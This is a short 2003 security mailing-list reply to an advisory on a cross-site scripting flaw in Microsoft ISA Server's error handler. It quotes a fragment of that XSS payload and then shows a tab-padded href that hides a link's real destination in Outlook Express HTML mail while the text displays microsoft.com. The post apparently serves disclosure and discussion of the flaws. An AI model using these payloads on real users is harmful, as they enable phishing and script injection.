Re: Microsoft ISA Server HTTP error handler XSS (TL#007)

From: http-equivat_private
Date: Thu Jul 17 2003 - 16:05:38 PDT

     <!--

    http://=""%09onerror="document.scripts[0].src=%27http%5Cx3a%
    5Cx2f%
    5Cx2f

     -->

    This is very interesting. A side 'benefit' is that we can mask our
    true url with the same scheme.

    For an href in html in order to mask the true destination the <a
    href="....>bloatedcorp.com</a>, can be manipulated by trivial
    javascript to generate a custom representation in the status bar to
    fool our recipient should they 'hover' the mouse over the link.

    This can be defeated quite simply like so:

    <A href="http://%09%09%09%09%09%09%09
    09www.malware.com">http://www.microsoft.com>

    In an html mail message [default in Outlook Express] plus restricted
    zone in Outlook Express 6 [again default] where no scripting is
    allowed, the above link when presented to the recipient in an html
    email message, and tested by 'hovering' the mouse over it, yields
    nothing. Blank. Thereafter accepting the url, transports us to our
    site as required.

    End Call

    --
    http://www.malware.com